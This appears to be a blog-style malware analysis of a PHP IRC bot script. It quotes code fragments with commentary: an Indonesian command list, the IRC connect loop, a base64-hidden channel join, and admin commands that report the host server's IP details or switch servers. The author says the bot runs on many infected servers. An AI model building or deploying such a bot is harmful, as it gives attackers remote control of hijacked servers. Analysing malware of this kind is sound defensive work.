" 12!botnick - Ganti nick (Admin/master)",
" 12!k - Kick nick (Channel)",
" 12!kb - Kick ban nick (Channel)",
" 12!changenick - Ganti nick ke nick internal",
" 12!op [nick2] [nick3] - Op (Channel)",
" 12!deop [nick2] [nick3] - Deop (Channel)",
" 12!v [nick2] [nick3] - voice (Channel)",
" 12!dv [nick2] [nick3] - Devoice (Channel)",
" 12!away [alasan] - Meminta nick untuk Away",
" 12!mode - Mengubah Mode (Channel)",
" 12!nickmode - Mengeset user mode",
" 12!userlist - Melihat daftar user",
" 12!quit [pesan] - Quit dari IRC (Admin)",
" 12!vhost [vhost] - Mengganti Vhost",
" 12!jump [server] - Mengganti Server bot",
" 12!fullname [nama] - Mengganti Fullname bot",
" 12!topic - Mengganti topik channel (Channel)",
" 12!help - Melihat help (Query)",
" 12!ngomong - Mengaktifkan Auto Response",
" 12!diam - Menonaktifkan Auto Response",
" 12!wb - Menambahkan pesan Welcome utk nick tertentu",
"-",
' 3,9? 0,1 ? By VJ_dEnDy - #pangkul @ irc.allnetwork.org ? 3,9? ',
);

this is the help, and its obviously a good system to know the supported commands.

$nick = $nicklist[rand(0,count($nicklist) - 1)];
$realname = $namaku;
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
$admin = strtolower($admin);
$auth = array(
$admin => array(
"name" => $admin,
"pass" => $bot_password,
"auth" => 1,
"status" => "Admin"
)
);

this choise a random name from nicklist and remotehost list, remotehost, and authentication parameters
composed by name, pass, auth and status that is set to' Admin'

$username = $identlist[rand(0,count($identlist) - 1)];
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);

Random identity

do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 60);
//Jika koneksi gagal
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp + 1;
hajar();
}
else {
echo ">Ga bisa connect ke $remotehost!";
$keluar = 1;
exit;
}
}

Connect to the remote host

$header = 'NICK '.$nick . CRL;
$header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $header);
$response = "
";

Sends identity to sock

while (!feof($fp)) {
$response .= fgets($fp, 1024);
if ($showresponse == 1) { echo $response."
"; }
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$offsetB = strpos($data, ' :');
$offsetC = strpos($data, '!');
$dFrom = substr($data,1,$offsetA-1);
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);

this receive the packet, and the following piece will handle server notifications

if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, base64_decode('Sk9JTiAjRmVlTENvTXo=') . CRL);
/*** Notice Bot Admin ***/
fputs($fp, 'NOTICE ' . $admin . ' :Hai Boss!' . CRL);
/*** Join Default Channel ***/
foreach ($channel as $v) { fputs($fp, 'JOIN ' .$v . CRL); }
}
elseif (substr($dCommand,0,3)=='432'){
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
//Nickname is already in use
elseif (substr($dCommand,0,3)=='433'){
$nick = $nicklist[rand(0,count($nicklist) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='465'){
echo "
Authentication diperlukan! Bot ini telah di-autokill.";
$akill = 2;
}
if (substr_count($dNick,'.allnetwork.org') > 0) {
if (substr_count($iText,"*** Banned") > 0) {
echo "BANNED!";
$keluar = 1;
exit;
}
}

/*** AI PHP BOT SCRIPT VJ_dEnDy ***/
$dcom = explode(" ", $dCommand);
if ($dcom[0]=='JOIN') {
/*** Auto Welcome by VJ_dEnDy ***/
$ada = FALSE;
if ($autowelcome) {
$jchan = ltrim($iText,":");
foreach ($nickwb as $v){
$trtext = strtolower($v[0]);
if (substr_count(strtolower($dNick),$trtext) > 0) {
sleep(3);
fputs($fp,'PRIVMSG '.$jchan.' :'.$v[1]. CRL);
$ada = TRUE;
}
}
}
if (($autowelcome) && ($dNick != $nick)) {
if(!$ada) {
$jchan = ltrim($iText,":");
$webe = $wbmsg[rand(0,count($wbmsg) - 1)];
$webe = str_replace("",$dNick,$webe);
$webe = str_replace("",$jchan,$webe);
$webe = str_replace("#","",$webe);
sleep(5);
fputs($fp,'PRIVMSG '.$jchan.' :'.$webe . CRL);
}
}
}
if ($dcom[0]=='PRIVMSG') {
/*** Auto Response by VJ_dEnDy ***/
if ($ngomong) {
$teman = FALSE;
if (in_array($dNick,$nicklist)) {
$teman = TRUE;
}

enable autoresponse in case of private message, BOT handles also the following events

1. Good Reply
2. Bad Reply -> Kick
3. Protection Against Flood

successively we have the command parsing function

some interesting command

fputs($fp,'NOTICE '.$dNick.' :'.chr(1).base64_decode("VkVSU0lPTiBGZWVMQ29NeiBBSSBQSFBCb3QgU2NyaXB0IEJ5IF
J
vTno=").chr(1) . CRL);

Decoded: VERSION FeeLCoMz AI PHPBot Script By RoNz

elseif ($com[3]==':!info') {
if ($auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bip = $_SERVER['SERVER_ADDR'];
$bphp = $_SERVER['PHP_SELF'];
$bruri = $_SERVER['REQUEST_URI'];
$brip = $_SERVER['REMOTE_ADDR'];
$brport = $_SERVER['REMOTE_PORT'];
fputs($fp,"NOTICE $dNick :Host: $bhost | Script: $bphp | Referer: $bruri | IP: $bip | Your IP: $brip Port:$brport" . CRL);

This is the reply in case of an Admin send !info

and here other two commands that can use only Admin, !vhost and !jump that selects randomly
a remotehost

elseif ($com[3]==':!vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':!jump' && $auth["$dNick"]["status"]=="Admin") {
if (empty($com[4])) {
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
}

This BOT infects a large ammount of servers actually..

See you to the next post.. :)